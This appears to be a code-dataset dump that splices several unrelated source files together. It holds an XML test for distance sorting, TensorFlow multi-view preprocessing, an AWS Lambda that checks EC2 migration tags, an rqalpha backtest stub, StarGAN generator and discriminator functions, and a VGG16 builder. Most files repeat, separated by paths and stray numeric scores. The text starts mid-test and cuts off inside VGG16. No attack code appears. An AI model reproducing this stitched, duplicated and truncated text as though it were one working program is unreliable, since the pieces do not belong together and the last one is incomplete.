<template>
<text>
<xpath function="case_name"/>
</text>
</template>
<sort direction="descending" order="1" type="double">
<text>
<xpath function="if(case_name = '', 2147483647, round(distance(case_name, here())))"/>
</text>
</sort>
</field>
</partial>
""",
suite,
template_xpath
)
def test_short_detail_xml_sort_only(self):
short = self.case_details.short
short.display = 'short'
short.sort_elements.append(
SortElement(
field='gps',
type='distance',
direction='descending',
)
)
suite = self.factory.app.create_suite()
template_xpath = './detail[@id="m0_case_short"]/field'
self.assertXmlHasXpath(suite, template_xpath)
self.assertXmlPartialEqual(
"""
<partial>
<field>
<header>
<text>
<locale id="m0.case_short.case_name_1.header"/>
</text>
</header>
<template>
<text>
<xpath function="case_name"/>
</text>
</template>
</field>
<field>
<header width="0">
<text/>
</header>
<template width="0">
<text>
<xpath function="gps"/>
</text>
</template>
<sort direction="descending" order="1" type="double">
<text>
<xpath function="if(gps = '', 2147483647, round(distance(gps, here())))"/>
</text>
</sort>
</field>
</partial>
""",
suite,
template_xpath
)
def test_long_detail_xml(self):
long_ = self.case_details.long
long_.display = 'long'
long_column = long_.get_column(0)
long_column.format = 'distance'
suite = self.factory.app.create_suite()
template_xpath = './detail[@id="m0_case_long"]/field'
self.assertXmlHasXpath(suite, template_xpath)
self.assertXmlPartialEqual(
"""
<partial>
<field>
<header>
<text>
<locale id="m0.case_long.case_name_1.header"/>
</text>
</header>
<template>
<text>
<xpath function="if(here() = '' or case_name = '', '', concat(round(distance(case_name, here()) div 100) div 10, ' km'))"/>
</text>
</template>
</field>
</partial>
""",
suite,
template_xpath
) | 0.470007 | 0.227931 |
import numpy as np
import tensorflow as tf
from util.camera import camera_from_blender, quaternion_from_campos
def pool_single_view(cfg, tensor, view_idx):
indices = tf.range(cfg.batch_size) * cfg.step_size + view_idx
indices = tf.expand_dims(indices, axis=-1)
return tf.gather_nd(tensor, indices)
class DataBase(object):
def __init__(self, cfg):
self._params = cfg
def cfg(self):
return self._params
def preprocess(self, raw_inputs, step_size, random_views=False):
"""Selects the subset of viewpoints to train on."""
cfg = self.cfg()
var_num_views = cfg.variable_num_views
num_views = raw_inputs['image'].get_shape().as_list()[1]
quantity = cfg.batch_size
if cfg.num_views_to_use == -1:
max_num_views = num_views
else:
max_num_views = cfg.num_views_to_use
inputs = dict()
def batch_sampler(all_num_views):
out = np.zeros((0, 2), dtype=np.int64)
valid_samples = np.zeros((0), dtype=np.float32)
for n in range(quantity):
valid_samples_m = np.ones((step_size), dtype=np.float32)
if var_num_views:
num_actual_views = int(all_num_views[n, 0])
ids = np.random.choice(num_actual_views, min(step_size, num_actual_views), replace=False)
if num_actual_views < step_size:
to_fill = step_size - num_actual_views
ids = np.concatenate((ids, np.zeros((to_fill), dtype=ids.dtype)))
valid_samples_m[num_actual_views:] = 0.0
elif random_views:
ids = np.random.choice(max_num_views, step_size, replace=False)
else:
ids = np.arange(0, step_size).astype(np.int64)
ids = np.expand_dims(ids, axis=-1)
batch_ids = np.full((step_size, 1), n, dtype=np.int64)
full_ids = np.concatenate((batch_ids, ids), axis=-1)
out = np.concatenate((out, full_ids), axis=0)
valid_samples = np.concatenate((valid_samples, valid_samples_m), axis=0)
return out, valid_samples
num_actual_views = raw_inputs['num_views'] if var_num_views else tf.constant([0])
indices, valid_samples = tf.py_func(batch_sampler, [num_actual_views], [tf.int64, tf.float32])
indices = tf.reshape(indices, [step_size*quantity, 2])
inputs['valid_samples'] = tf.reshape(valid_samples, [step_size*quantity])
inputs['masks'] = tf.gather_nd(raw_inputs['mask'], indices)
inputs['masks_sdf'] = tf.gather_nd(raw_inputs['mask_sdf'], indices)
inputs['images'] = tf.gather_nd(raw_inputs['image'], indices)
if cfg.saved_depth:
inputs['depths'] = tf.gather_nd(raw_inputs['depth'], indices)
inputs['images_1'] = pool_single_view(cfg, inputs['images'], 0)
def fix_matrix(extr):
out = np.zeros_like(extr)
num_matrices = extr.shape[0]
for k in range(num_matrices):
out[k, :, :] = camera_from_blender(extr[k, :, :])
return out
def quaternion_from_campos_wrapper(campos):
num = campos.shape[0]
out = np.zeros([num, 4], dtype=np.float32)
for k in range(num):
out[k, :] = quaternion_from_campos(campos[k, :])
return out
if cfg.saved_camera:
matrices = tf.gather_nd(raw_inputs['extrinsic'], indices)
orig_shape = matrices.shape
extr_tf = tf.py_func(fix_matrix, [matrices], tf.float32)
inputs['matrices'] = tf.reshape(extr_tf, shape=orig_shape)
cam_pos = tf.gather_nd(raw_inputs['cam_pos'], indices)
orig_shape = cam_pos.shape
quaternion = tf.py_func(quaternion_from_campos_wrapper, [cam_pos], tf.float32)
inputs['camera_quaternion'] = tf.reshape(quaternion, shape=[orig_shape[0], 4])
return inputs | drwr/data_base/data_base.py | import numpy as np
import tensorflow as tf
from util.camera import camera_from_blender, quaternion_from_campos
def pool_single_view(cfg, tensor, view_idx):
indices = tf.range(cfg.batch_size) * cfg.step_size + view_idx
indices = tf.expand_dims(indices, axis=-1)
return tf.gather_nd(tensor, indices)
class DataBase(object):
def __init__(self, cfg):
self._params = cfg
def cfg(self):
return self._params
def preprocess(self, raw_inputs, step_size, random_views=False):
"""Selects the subset of viewpoints to train on."""
cfg = self.cfg()
var_num_views = cfg.variable_num_views
num_views = raw_inputs['image'].get_shape().as_list()[1]
quantity = cfg.batch_size
if cfg.num_views_to_use == -1:
max_num_views = num_views
else:
max_num_views = cfg.num_views_to_use
inputs = dict()
def batch_sampler(all_num_views):
out = np.zeros((0, 2), dtype=np.int64)
valid_samples = np.zeros((0), dtype=np.float32)
for n in range(quantity):
valid_samples_m = np.ones((step_size), dtype=np.float32)
if var_num_views:
num_actual_views = int(all_num_views[n, 0])
ids = np.random.choice(num_actual_views, min(step_size, num_actual_views), replace=False)
if num_actual_views < step_size:
to_fill = step_size - num_actual_views
ids = np.concatenate((ids, np.zeros((to_fill), dtype=ids.dtype)))
valid_samples_m[num_actual_views:] = 0.0
elif random_views:
ids = np.random.choice(max_num_views, step_size, replace=False)
else:
ids = np.arange(0, step_size).astype(np.int64)
ids = np.expand_dims(ids, axis=-1)
batch_ids = np.full((step_size, 1), n, dtype=np.int64)
full_ids = np.concatenate((batch_ids, ids), axis=-1)
out = np.concatenate((out, full_ids), axis=0)
valid_samples = np.concatenate((valid_samples, valid_samples_m), axis=0)
return out, valid_samples
num_actual_views = raw_inputs['num_views'] if var_num_views else tf.constant([0])
indices, valid_samples = tf.py_func(batch_sampler, [num_actual_views], [tf.int64, tf.float32])
indices = tf.reshape(indices, [step_size*quantity, 2])
inputs['valid_samples'] = tf.reshape(valid_samples, [step_size*quantity])
inputs['masks'] = tf.gather_nd(raw_inputs['mask'], indices)
inputs['masks_sdf'] = tf.gather_nd(raw_inputs['mask_sdf'], indices)
inputs['images'] = tf.gather_nd(raw_inputs['image'], indices)
if cfg.saved_depth:
inputs['depths'] = tf.gather_nd(raw_inputs['depth'], indices)
inputs['images_1'] = pool_single_view(cfg, inputs['images'], 0)
def fix_matrix(extr):
out = np.zeros_like(extr)
num_matrices = extr.shape[0]
for k in range(num_matrices):
out[k, :, :] = camera_from_blender(extr[k, :, :])
return out
def quaternion_from_campos_wrapper(campos):
num = campos.shape[0]
out = np.zeros([num, 4], dtype=np.float32)
for k in range(num):
out[k, :] = quaternion_from_campos(campos[k, :])
return out
if cfg.saved_camera:
matrices = tf.gather_nd(raw_inputs['extrinsic'], indices)
orig_shape = matrices.shape
extr_tf = tf.py_func(fix_matrix, [matrices], tf.float32)
inputs['matrices'] = tf.reshape(extr_tf, shape=orig_shape)
cam_pos = tf.gather_nd(raw_inputs['cam_pos'], indices)
orig_shape = cam_pos.shape
quaternion = tf.py_func(quaternion_from_campos_wrapper, [cam_pos], tf.float32)
inputs['camera_quaternion'] = tf.reshape(quaternion, shape=[orig_shape[0], 4])
return inputs | 0.841956 | 0.323353 |
"""Find the passed in instance id and see if it is a CE migration"""
from __future__ import annotations
import json
import os
from typing import Any, Dict
import boto3
from migrationstate import MigrationStateHandler
print("Loading function find_instance")
ec2_resource = boto3.resource("ec2")
sqs = boto3.client("sqs")
# {
# "version": "0",
# "id": "7e979767-95bb-1972-0cab-a670ec5d5000",
# "detail-type": "EC2 Instance State-change Notification",
# "source": "aws.ec2",
# "account": "460535642604",
# "time": "2019-08-23T13:45:28Z",
# "region": "us-east-1",
# "resources": [
# "arn:aws:ec2:us-east-1:460535642604:instance/i-00c758f34483a2ea2"
# ],
# "detail": {
# "instance-id": "i-00c758f34483a2ea2",
# "state": "running"
# }
# }
def lambda_handler(event: Dict[str, Any], context: Any) -> str:
"""Handle signaling and entry into the AWS Lambda."""
print("Received event: " + json.dumps(event, indent=2))
detail: Dict[str, Any] = event.get("detail", {})
event_dict: Dict[str, Any] = {}
instance_id: str = detail.get("instance-id", "")
if not instance_id:
event_dict["instance_id"] = "not-found"
return event_dict
try:
instance = ec2_resource.Instance(instance_id)
# look for tags that show it is a CE migration that has not run yet
for tag in instance.tags:
if tag["Key"] == "CloneStatus":
if tag["Value"] == "NOT_STARTED":
event_dict["instance_id"] = instance_id
else:
event_dict["instance_id"] = "not-migration"
if tag["Key"] == "DestinationAccount":
event_dict["account"] = tag["Value"]
if tag["Key"] == "DestinationKMS":
event_dict["kms_id"] = tag["Value"]
if tag["Key"] == "DestinationRole":
event_dict["role"] = tag["Value"]
if tag["Key"] == "Name":
event_dict["name"] = tag["Value"]
except Exception as e:
print(e)
event_dict["instance_id"] = "not-found"
MigrationStateHandler().update_state(state="INSTANCE_LAUNCHED", machine_name=event_dict.get("name"))
return event_dict | step/lambdas/find_instance.py | """Find the passed in instance id and see if it is a CE migration"""
from __future__ import annotations
import json
import os
from typing import Any, Dict
import boto3
from migrationstate import MigrationStateHandler
print("Loading function find_instance")
ec2_resource = boto3.resource("ec2")
sqs = boto3.client("sqs")
# {
# "version": "0",
# "id": "7e979767-95bb-1972-0cab-a670ec5d5000",
# "detail-type": "EC2 Instance State-change Notification",
# "source": "aws.ec2",
# "account": "460535642604",
# "time": "2019-08-23T13:45:28Z",
# "region": "us-east-1",
# "resources": [
# "arn:aws:ec2:us-east-1:460535642604:instance/i-00c758f34483a2ea2"
# ],
# "detail": {
# "instance-id": "i-00c758f34483a2ea2",
# "state": "running"
# }
# }
def lambda_handler(event: Dict[str, Any], context: Any) -> str:
"""Handle signaling and entry into the AWS Lambda."""
print("Received event: " + json.dumps(event, indent=2))
detail: Dict[str, Any] = event.get("detail", {})
event_dict: Dict[str, Any] = {}
instance_id: str = detail.get("instance-id", "")
if not instance_id:
event_dict["instance_id"] = "not-found"
return event_dict
try:
instance = ec2_resource.Instance(instance_id)
# look for tags that show it is a CE migration that has not run yet
for tag in instance.tags:
if tag["Key"] == "CloneStatus":
if tag["Value"] == "NOT_STARTED":
event_dict["instance_id"] = instance_id
else:
event_dict["instance_id"] = "not-migration"
if tag["Key"] == "DestinationAccount":
event_dict["account"] = tag["Value"]
if tag["Key"] == "DestinationKMS":
event_dict["kms_id"] = tag["Value"]
if tag["Key"] == "DestinationRole":
event_dict["role"] = tag["Value"]
if tag["Key"] == "Name":
event_dict["name"] = tag["Value"]
except Exception as e:
print(e)
event_dict["instance_id"] = "not-found"
MigrationStateHandler().update_state(state="INSTANCE_LAUNCHED", machine_name=event_dict.get("name"))
return event_dict | 0.524151 | 0.290477 |
from rqalpha.api import *
import talib
from rqalpha import run_func
import numpy as np
import datetime
"""
Bar(symbol: u'\u73e0\u6c5f\u94a2\u7434', order_book_id: u'002678.XSHE', datetime: datetime.datetime(2014, 1, 2, 0, 0),
open: 7.08, close: 7.07, high: 7.14, low: 7.03, volume: 3352317.0, total_turnover: 23756852, limit_up: 7.78, limit_down: 6.36)
rqalpha run -f lstm.py -s 2014-01-01 -e 2018-01-01 --account stock 100000 --plot
http://scikit-learn.org/stable/modules/preprocessing.html#standardization-or-mean-removal-and-variance-scaling
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=0)
rqalpha run -f get_day_close_price.py -s 2000-01-01 -e 2017-01-01 -o result.pkl --plot --progress --account stock 10000
"""
#scheduler调用的函数需要包括context, bar_dict两个参数
def week_close_prise(context, bar_dict):
logger.info("Remaning cash: %r" % context.portfolio.cash)
for s1 in context.all:
#logger.info(bar_dict[s1])
order_book_id = bar_dict[s1].order_book_id
#history_close = history_bars(order_book_id, 50, '1d', 'close')
info = "%s id: %s close: %s" % (bar_dict[s1].symbol,bar_dict[s1].order_book_id, bar_dict[s1].close)
#logger.info(info)
name = bar_dict[s1].symbol
id = bar_dict[s1].order_book_id
close_price = bar_dict[s1].close
if context.all_close_price.get(id, []):
context.all_close_price[id].append(close_price)
else:
context.all_close_price[id] = [close_price]
context.today = bar_dict[s1].datetime
# 在这个方法中编写任何的初始化逻辑。context对象将会在你的算法策略的任何方法之间做传递。
def init(context):
# 在context中保存全局变量
context.all_close_price = {}
context.today = None
# before_trading此函数会在每天策略交易开始前被调用,当天只会被调用一次
def before_trading(context):
logger.info("开盘前执行before_trading函数")
# 你选择的证券的数据更新将会触发此段逻辑,例如日或分钟历史数据切片或者是实时数据切片更新
def handle_bar(context, bar_dict):
logger.info("每一个Bar执行")
logger.info("打印Bar数据:")
#np.save("%s_X" % context.s1, np.array(context.X))
#np.save("%s_y" % context.s1, np.array(context.y))
# after_trading函数会在每天交易结束后被调用,当天只会被调用一次
def after_trading(context):
logger.info("收盘后执行after_trading函数")
def end(context):
logger.info("--------------end-------------")
logger.info("------------end---------------")
config = {
"base": {
"start_date": "2016-04-01",
"end_date": "2016-12-01",
"accounts": {
"stock": 100000
}
},
"extra": {
"log_level": "verbose",
},
"mod": {
"sys_analyser": {
"enabled": True,
"plot": True
}
}
}
# 您可以指定您要传递的参数
run_func(init=init, before_trading=before_trading, handle_bar=handle_bar, end=end,config=config) | rqalpha/examples/close_price_week.py |
from rqalpha.api import *
import talib
from rqalpha import run_func
import numpy as np
import datetime
"""
Bar(symbol: u'\u73e0\u6c5f\u94a2\u7434', order_book_id: u'002678.XSHE', datetime: datetime.datetime(2014, 1, 2, 0, 0),
open: 7.08, close: 7.07, high: 7.14, low: 7.03, volume: 3352317.0, total_turnover: 23756852, limit_up: 7.78, limit_down: 6.36)
rqalpha run -f lstm.py -s 2014-01-01 -e 2018-01-01 --account stock 100000 --plot
http://scikit-learn.org/stable/modules/preprocessing.html#standardization-or-mean-removal-and-variance-scaling
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=0)
rqalpha run -f get_day_close_price.py -s 2000-01-01 -e 2017-01-01 -o result.pkl --plot --progress --account stock 10000
"""
#scheduler调用的函数需要包括context, bar_dict两个参数
def week_close_prise(context, bar_dict):
logger.info("Remaning cash: %r" % context.portfolio.cash)
for s1 in context.all:
#logger.info(bar_dict[s1])
order_book_id = bar_dict[s1].order_book_id
#history_close = history_bars(order_book_id, 50, '1d', 'close')
info = "%s id: %s close: %s" % (bar_dict[s1].symbol,bar_dict[s1].order_book_id, bar_dict[s1].close)
#logger.info(info)
name = bar_dict[s1].symbol
id = bar_dict[s1].order_book_id
close_price = bar_dict[s1].close
if context.all_close_price.get(id, []):
context.all_close_price[id].append(close_price)
else:
context.all_close_price[id] = [close_price]
context.today = bar_dict[s1].datetime
# 在这个方法中编写任何的初始化逻辑。context对象将会在你的算法策略的任何方法之间做传递。
def init(context):
# 在context中保存全局变量
context.all_close_price = {}
context.today = None
# before_trading此函数会在每天策略交易开始前被调用,当天只会被调用一次
def before_trading(context):
logger.info("开盘前执行before_trading函数")
# 你选择的证券的数据更新将会触发此段逻辑,例如日或分钟历史数据切片或者是实时数据切片更新
def handle_bar(context, bar_dict):
logger.info("每一个Bar执行")
logger.info("打印Bar数据:")
#np.save("%s_X" % context.s1, np.array(context.X))
#np.save("%s_y" % context.s1, np.array(context.y))
# after_trading函数会在每天交易结束后被调用,当天只会被调用一次
def after_trading(context):
logger.info("收盘后执行after_trading函数")
def end(context):
logger.info("--------------end-------------")
logger.info("------------end---------------")
config = {
"base": {
"start_date": "2016-04-01",
"end_date": "2016-12-01",
"accounts": {
"stock": 100000
}
},
"extra": {
"log_level": "verbose",
},
"mod": {
"sys_analyser": {
"enabled": True,
"plot": True
}
}
}
# 您可以指定您要传递的参数
run_func(init=init, before_trading=before_trading, handle_bar=handle_bar, end=end,config=config) | 0.2587 | 0.261696 |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow.compat.v1 as tf
from tensorflow_gan.examples.stargan import layers
from tensorflow_gan.examples.stargan import ops
def generator(inputs, targets):
"""Generator module.
Piece everything together for the Generator.
PyTorch Version:
https://github.com/yunjey/StarGAN/blob/fbdb6a6ce2a4a92e1dc034faec765e0dbe4b8164/model.py#L22
Args:
inputs: Tensor of shape (batch_size, h, w, c) representing the
images/information that we want to transform.
targets: Tensor of shape (batch_size, num_domains) representing the target
domain the generator should transform the image/information to.
Returns:
Tensor of shape (batch_size, h, w, c) as the inputs.
"""
with tf.variable_scope('generator'):
input_with_condition = ops.condition_input_with_pixel_padding(
inputs, targets)
down_sample = layers.generator_down_sample(input_with_condition)
bottleneck = layers.generator_bottleneck(down_sample)
up_sample = layers.generator_up_sample(bottleneck, inputs.shape[-1])
return up_sample
def discriminator(input_net, class_num):
"""Discriminator Module.
Piece everything together and reshape the output source tensor
PyTorch Version:
https://github.com/yunjey/StarGAN/blob/fbdb6a6ce2a4a92e1dc034faec765e0dbe4b8164/model.py#L63
Notes:
The PyTorch Version run the reduce_mean operation later in their solver:
https://github.com/yunjey/StarGAN/blob/fbdb6a6ce2a4a92e1dc034faec765e0dbe4b8164/solver.py#L245
Args:
input_net: Tensor of shape (batch_size, h, w, c) as batch of images.
class_num: (int) number of domain to be predicted
Returns:
output_src: Tensor of shape (batch_size) where each value is a logit
representing whether the image is real of fake.
output_cls: Tensor of shape (batch_size, class_um) where each value is a
logit representing whether the image is in the associated domain.
"""
with tf.variable_scope('discriminator'):
hidden = layers.discriminator_input_hidden(input_net)
output_src = layers.discriminator_output_source(hidden)
output_src = tf.layers.flatten(output_src)
output_src = tf.reduce_mean(input_tensor=output_src, axis=1)
output_cls = layers.discriminator_output_class(hidden, class_num)
return output_src, output_cls | tensorflow_gan/examples/stargan/network.py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow.compat.v1 as tf
from tensorflow_gan.examples.stargan import layers
from tensorflow_gan.examples.stargan import ops
def generator(inputs, targets):
"""Generator module.
Piece everything together for the Generator.
PyTorch Version:
https://github.com/yunjey/StarGAN/blob/fbdb6a6ce2a4a92e1dc034faec765e0dbe4b8164/model.py#L22
Args:
inputs: Tensor of shape (batch_size, h, w, c) representing the
images/information that we want to transform.
targets: Tensor of shape (batch_size, num_domains) representing the target
domain the generator should transform the image/information to.
Returns:
Tensor of shape (batch_size, h, w, c) as the inputs.
"""
with tf.variable_scope('generator'):
input_with_condition = ops.condition_input_with_pixel_padding(
inputs, targets)
down_sample = layers.generator_down_sample(input_with_condition)
bottleneck = layers.generator_bottleneck(down_sample)
up_sample = layers.generator_up_sample(bottleneck, inputs.shape[-1])
return up_sample
def discriminator(input_net, class_num):
"""Discriminator Module.
Piece everything together and reshape the output source tensor
PyTorch Version:
https://github.com/yunjey/StarGAN/blob/fbdb6a6ce2a4a92e1dc034faec765e0dbe4b8164/model.py#L63
Notes:
The PyTorch Version run the reduce_mean operation later in their solver:
https://github.com/yunjey/StarGAN/blob/fbdb6a6ce2a4a92e1dc034faec765e0dbe4b8164/solver.py#L245
Args:
input_net: Tensor of shape (batch_size, h, w, c) as batch of images.
class_num: (int) number of domain to be predicted
Returns:
output_src: Tensor of shape (batch_size) where each value is a logit
representing whether the image is real of fake.
output_cls: Tensor of shape (batch_size, class_um) where each value is a
logit representing whether the image is in the associated domain.
"""
with tf.variable_scope('discriminator'):
hidden = layers.discriminator_input_hidden(input_net)
output_src = layers.discriminator_output_source(hidden)
output_src = tf.layers.flatten(output_src)
output_src = tf.reduce_mean(input_tensor=output_src, axis=1)
output_cls = layers.discriminator_output_class(hidden, class_num)
return output_src, output_cls | 0.945343 | 0.441011 |
import tensorflow as tf
from poda.layers.merge import *
from poda.layers.dense import *
from poda.layers.activation import *
from poda.layers.regularizer import *
from poda.layers.convolutional import *
class VGG16(object):
def __init__(self, input_tensor, num_blocks=5, classes=1000, batch_normalizations = True, num_depthwise_layers=None, num_dense_layers=1, num_hidden_units=4096, activation_denses='relu', dropout_rates=None, regularizers=None, scopes=None):
"""[summary]
Arguments:
object {[type]} -- [description]
input_tensor {[type]} -- [description]
Keyword Arguments:
classes {int} -- [description] (default: {1000})
batch_normalization {bool} -- [description] (default: {True})
"""
self.input_tensor = input_tensor
self.num_block = num_blocks
self.classes = classes
self.batch_normalization = batch_normalizations
self.num_depthwise_layer = num_depthwise_layers
self.num_dense_layer = num_dense_layers
self.num_hidden_unit = num_hidden_units
self.activation_dense = activation_denses
self.dropout_rate = dropout_rates
self.regularizer = regularizers
self.scope = scopes
def vgg_block(self, input_tensor, num_block=5, batch_normalization=True):
with tf.compat.v1.variable_scope(self.scope, 'vgg_16', [input_tensor]):
with tf.compat.v1.variable_scope('Block_1'):
conv_1 = convolution_2d(input_tensor=input_tensor, number_filters=64, kernel_sizes=(3,3), stride_sizes=(1,1), paddings='same', activations='relu', batch_normalizations=batch_normalization, dropout_rates=None, names=None)
conv_2 = convolution_2d(input_tensor=conv_1, number_filters=64, kernel_sizes=(3,3), stride_sizes=(1,1), paddings='same', activations='relu', batch_normalizations=batch_normalization, dropout_rates=None, names=None)
conv_3 = max_pool_2d(input_tensor=conv_2, pool_sizes=(2,2), stride_sizes=(2,2), paddings='valid', names=None)
with tf.compat.v1.variable_scope('Block_2'):
conv_4 = convolution_2d(input_tensor=conv_3, number_filters=128, kernel_sizes=(3,3), stride_sizes=(1,1), paddings='same', activations='relu', batch_normalizations=batch_normalization, dropout_rates=None, names=None)
conv_5 = convolution_2d(input_tensor=conv_4, number_filters=128, kernel_sizes=(3,3), stride_sizes=(1,1), paddings='same', activations='relu', batch_normalizations=batch_normalization, dropout_rates=None, names=None)
conv_6 = max_pool_2d(input_tensor=conv_5, pool_sizes=(2,2), stride_sizes=(2,2), paddings='valid', names=None)
with tf.compat.v1.variable_scope('Block_3'):
conv_7 = convolution_2d(input_tensor=conv_6, number_filters=256, kernel_sizes=(3,3), stride_sizes=(1,1), paddings='same', activations='relu', batch_normalizations=batch_normalization, dropout_rates=None, names=None)
conv_8 = convolution_2d(input_tensor=conv_7, number_filters=256, kernel_sizes=(3,3), stride_sizes=(1,1), paddings='same', activations='relu', batch_normalizations=batch_normalization, dropout_rates=None, names=None)
conv_9 = convolution_2d(input_tensor=conv_8, number_filters=256, kernel_sizes=(3,3), stride_sizes=(1,1), paddings='same', activations='relu', batch_normalizations=batch_normalization, dropout_rates=None, names=None)
conv_10 = max_pool_2d(input_tensor=conv_9, pool_sizes=(2,2), stride_sizes=(2,2), paddings='valid', names=None)
with tf.compat.v1.variable_scope('Block_4'):
conv_11 = convolution_2d(input_tensor=conv_10, number_filters=512, kernel_sizes=(3,3), stride_sizes=(1,1), paddings='same', activations='relu', batch_normalizations=batch_normalization, dropout_rates=None, names=None)
conv_12 = convolution_2d(input_tensor=conv_11, number_filters=512, kernel_sizes=(3,3), stride_sizes=(1,1), paddings='same', activations='relu', batch_normalizations=batch_normalization, dropout_rates=None, names=None)
conv_13 = convolution_2d(input_tensor=conv_12, number_filters=512, kernel_sizes=(3,3), stride_sizes=(1,1), paddings='same', activations='relu', batch_normalizations=batch_normalization, dropout_rates=None, names=None)
conv_14 = max_pool_2d(input_tensor=conv_13, pool_sizes=(2,2), stride_sizes=(2,2), paddings='valid', names=None)
with tf.compat.v1.variable_scope('Block_5'):
conv_15 = convolution_2d(input_tensor=conv_14, number_filters=512, kernel_sizes=(3,3), stride_sizes=(1,1), paddings='same', activations='relu', batch_normalizations=batch_normalization, dropout_rates=None, names=None)
conv_16 = convolution_2d(input_tensor=conv_15, number_filters=512, kernel_sizes=(3,3), stride_sizes=(1,1), paddings='same', activations='relu', batch_normalizations=batch_normalization, dropout_rates=None, names=None)
conv_17 = convolution_2d(input_tensor=conv_16, number_filters=512, kernel_sizes=(3,3), stride_sizes=(1,1), paddings='same', activations='relu', batch_normalizations=batch_normalization, dropout_rates=None, names=None)
conv_18 = max_pool_2d(input_tensor=conv_17, pool_sizes=(2,2), stride_sizes=(2,2), paddings='valid', names=None)
if num_block==1:
vgg_16 = conv_3
elif num_block==2:
vgg_16 = conv_6
elif num_block==3:
vgg_16 = conv_10
elif num_block==4:
vgg_16 = conv_14
elif num_block==5:
vgg_16 = conv_18
else:
vgg_16 = conv_18
return vgg_16
def create_model(self):
number_filter = self.input_tensor.get_shape().as_list()[-1]
vgg_base = self.vgg_block(input_tensor=self.input_tensor, num_block=self.num_block, batch_normalization=self.batch_normalization)
base_var_list = tf.compat.v1.get_collection(tf.compat.v1.GraphKeys.GLOBAL_VARIABLES)
with tf.compat.v1.variable_scope(self.scope, 'vgg_16', [vgg_base]):
if self.num_depthwise_layer!=None or self.num_depthwise_layer>0:
for j in range(0,self.num_depthwise_layer):
##### FIX THIS TOMORROW
vgg_base = depthwise_convolution_2d(input_tensor=vgg_base, number_filters=number_filter, kernel_sizes=(3,3), stride_sizes=(1,1), paddings='same', activations='relu', dropout_rates=None, names=None)
else:
flatten_layer = flatten(input_tensor=vgg_base, names='flatten')
for i in range(0, self.num_dense_layer):
vgg_base = dense(input_tensor=flatten_layer, hidden_units=self.num_hidden_unit, activations=self.activation_dense, regularizers=self.regularizer, scale=self.dropout_rate)
last_layer = flatten(input_tensor=vgg_base, names='flatten')
full_var_list = tf.compat.v1.get_collection(tf.compat.v1.GraphKeys.GLOBAL_VARIABLES)
non_logit = dense(input_tensor=last_layer, hidden_units=self.classes, names='output')
if self.classes > 2:
output = softmax(input_tensor=non_logit, names='output')
else:
output = sigmoid(input_tensor=non_logit, names='output')
return non_logit, output, base_var_list, full_var_list | poda/transfer_learning/Vgg16.py | import tensorflow as tf
from poda.layers.merge import *
from poda.layers.dense import *
from poda.layers.activation import *
from poda.layers.regularizer import *
from poda.layers.convolutional import *
class VGG16(object):
def __init__(self, input_tensor, num_blocks=5, classes=1000, batch_normalizations = True, num_depthwise_layers=None, num_dense_layers=1, num_hidden_units=4096, activation_denses='relu', dropout_rates=None, regularizers=None, scopes=None):
"""[summary]
Arguments:
object {[type]} -- [description]
input_tensor {[type]} -- [description]
Keyword Arguments:
classes {int} -- [description] (default: {1000})
batch_normalization {bool} -- [description] (default: {True})
"""
self.input_tensor = input_tensor
self.num_block = num_blocks
self.classes = classes
self.batch_normalization = batch_normalizations
self.num_depthwise_layer = num_depthwise_layers
self.num_dense_layer = num_dense_layers
self.num_hidden_unit = num_hidden_units
self.activation_dense = activation_denses
self.dropout_rate = dropout_rates
self.regularizer = regularizers
self.scope = scopes
def vgg_block(self, input_tensor, num_block=5, batch_normalization=True):
with tf.compat.v1.variable_scope(self.scope, 'vgg_16', [input_tensor]):
with tf.compat.v1.variable_scope('Block_1'):
conv_1 = convolution_2d(input_tensor=input_tensor, number_filters=64, kernel_sizes=(3,3), stride_sizes=(1,1), paddings='same', activations='relu', batch_normalizations=batch_normalization, dropout_rates=None, names=None)
conv_2 = convolution_2d(input_tensor=conv_1, number_filters=64, kernel_sizes=(3,3), stride_sizes=(1,1), paddings='same', activations='relu', batch_normalizations=batch_normalization, dropout_rates=None, names=None)
conv_3 = max_pool_2d(input_tensor=conv_2, pool_sizes=(2,2), stride_sizes=(2,2), paddings='valid', names=None)
with tf.compat.v1.variable_scope('Block_2'):
conv_4 = convolution_2d(input_tensor=conv_3, number_filters=128, kernel_sizes=(3,3), stride_sizes=(1,1), paddings='same', activations='relu', batch_normalizations=batch_normalization, dropout_rates=None, names=None)
conv_5 = convolution_2d(input_tensor=conv_4, number_filters=128, kernel_sizes=(3,3), stride_sizes=(1,1), paddings='same', activations='relu', batch_normalizations=batch_normalization, dropout_rates=None, names=None)
conv_6 = max_pool_2d(input_tensor=conv_5, pool_sizes=(2,2), stride_sizes=(2,2), paddings='valid', names=None)
with tf.compat.v1.variable_scope('Block_3'):
conv_7 = convolution_2d(input_tensor=conv_6, number_filters=256, kernel_sizes=(3,3), stride_sizes=(1,1), paddings='same', activations='relu', batch_normalizations=batch_normalization, dropout_rates=None, names=None)
conv_8 = convolution_2d(input_tensor=conv_7, number_filters=256, kernel_sizes=(3,3), stride_sizes=(1,1), paddings='same', activations='relu', batch_normalizations=batch_normalization, dropout_rates=None, names=None)
conv_9 = convolution_2d(input_tensor=conv_8, number_filters=256, kernel_sizes=(3,3), stride_sizes=(1,1), paddings='same', activations='relu', batch_normalizations=batch_normalization, dropout_rates=None, names=None)
conv_10 = max_pool_2d(input_tensor=conv_9, pool_sizes=(2,2), stride_sizes=(2,2), paddings='valid', names=None)
with tf.compat.v1.variable_scope('Block_4'):
conv_11 = convolution_2d(input_tensor=conv_10, number_filters=512, kernel_sizes=(3,3), stride_sizes=(1,1), paddings='same', activations='relu', batch_normalizations=batch_normalization, dropout_rates=None, names=None)
conv_12 = convolution_2d(input_tensor=conv_11, number_filters=512, kernel_sizes=(3,3), stride_sizes=(1,1), paddings='same', activations='relu', batch_normalizations=batch_normalization, dropout_rates=None, names=None)
conv_13 = convolution_2d(input_tensor=conv_12, number_filters=512, kernel_sizes=(3,3), stride_sizes=(1,1), paddings='same', activations='relu', batch_normalizations=batch_normalization, dropout_rates=None, names=None)
conv_14 = max_pool_2d(input_tensor=conv_13, pool_sizes=(2,2), stride_sizes=(2,2), paddings='valid', names=None)
with tf.compat.v1.variable_scope('Block_5'):
